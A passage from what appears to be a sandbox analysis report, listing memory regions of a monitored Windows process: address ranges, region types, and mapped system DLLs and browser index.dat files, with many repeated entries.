0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4356 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4357 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4358 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4359 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4360 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4361 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4362 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4363 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4364 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4365 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4366 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4367 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4368 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4369 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4370 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4371 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4372 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4373 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4374 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4375 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4376 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4377 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4378 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4379 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4380 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4381 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4382 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4383 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4384 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4385 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4386 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4387 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4388 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4389 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4390 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4391 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4392 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4393 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4394 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4395 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4396 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4397 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4398 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4399 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4400 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4401 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4402 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4403 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4408 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4409 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4410 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4411 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4412 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4416 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4417 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4418 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4419 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4420 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4421 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4423 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4424 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4436 start_va = 0x3160000 end_va = 0x3354fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 4437 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4438 start_va = 0x3360000 end_va = 0x351ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 4439 start_va = 0xb50000 end_va = 0xc2efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 4440 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 4441 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4442 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4443 start_va = 0x746b0000 end_va = 0x7512ffff monitored = 0 entry_point = 0x746b6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 4444 start_va = 0x76ca0000 end_va = 0x76ca4fff monitored = 0 entry_point = 0x76ca1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 4445 start_va = 0x74670000 end_va = 0x746abfff monitored = 0 entry_point = 0x74673089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 4446 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 4447 start_va = 0x260000 end_va = 0x261fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 4448 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 4449 start_va = 0x270000 end_va = 0x270fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 4450 start_va = 0x280000 end_va = 0x281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 4451 start_va = 0x3520000 end_va = 0x37eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4452 start_va = 0x73620000 end_va = 0x7364dfff monitored = 0 entry_point = 0x736216ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 4453 start_va = 0x270000 end_va = 0x270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4454 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4455 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4456 start_va = 0x2a0000 end_va = 0x2a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4457 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4458 start_va = 0x74490000 end_va = 0x744b0fff monitored = 0 entry_point = 0x7449145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 4459 start_va = 0x77130000 end_va = 0x77174fff monitored = 0 entry_point = 0x771311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 4460 start_va = 0x2c0000 end_va = 0x2c7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 4461 start_va = 0x3360000 end_va = 0x345ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 4462 start_va = 0x34e0000 end_va = 0x351ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 4463 start_va = 0x752e0000 end_va = 0x752ebfff monitored = 0 entry_point = 0x752e505c region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 4464 start_va = 0x729e0000 end_va = 0x72b6ffff monitored = 0 entry_point = 0x72a7d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 4465 start_va = 0x3160000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003160000" filename = "" Region: id = 4466 start_va = 0x31f0000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 4467 start_va = 0x3290000 end_va = 0x32cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 4468 start_va = 0x37f0000 end_va = 0x3ce1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 4469 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 4470 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4471 start_va = 0x728e0000 end_va = 0x729dafff monitored = 0 entry_point = 0x728f17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 4472 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4473 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 4474 start_va = 0x3cf0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 4475 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4476 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4477 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4478 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4479 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4480 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4481 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4482 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4483 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4484 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4485 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4486 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4487 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4488 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4489 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4490 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4491 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4492 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4493 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4494 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4495 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4496 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4497 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4498 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4499 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4500 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4501 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4502 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4503 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4504 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4505 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4506 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4507 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4508 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4509 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4510 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4511 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4512 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4513 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4514 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4515 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4516 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4517 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4518 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4519 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4520 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4521 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4522 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4523 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4524 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4525 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4526 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4527 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4528 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4529 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4530 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4531 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4532 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4533 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4534 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4535 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4536 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4537 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4538 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4539 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4540 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4541 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4542 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4543 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4544 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4545 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4546 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4547 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4548 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4549 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4550 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4551 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4552 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4553 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4554 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4555 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4556 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4557 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4558 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4559 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4560 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = 